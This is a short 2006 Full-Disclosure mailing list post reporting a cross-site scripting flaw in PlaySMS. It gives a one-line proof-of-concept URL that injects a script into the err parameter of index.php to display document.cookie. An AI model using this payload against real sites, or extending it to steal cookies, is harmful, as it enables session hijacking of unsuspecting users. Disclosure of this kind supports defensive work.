[Full-disclosure] XSS in PlaySMS

M.o.H.a.J.a.L.i mohajali2k4 at gmail.com
Sat Feb 11 23:35:26 GMT 2006


I Found an XSS Vulnerability in PlaySmS

Site:
playsms.sourceforge.net


PoC:
www.target.com/playsms/index.php?err=<script>alert(document.cookie);</script
>

Salam

http://mohajali.lezr.org
--
(r).....Now I Am Become Death....The Destroyer Of Worlds....(c)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060212/5974f791/attachment.html 


Full-Disclosure is hosted and sponsored by Secunia.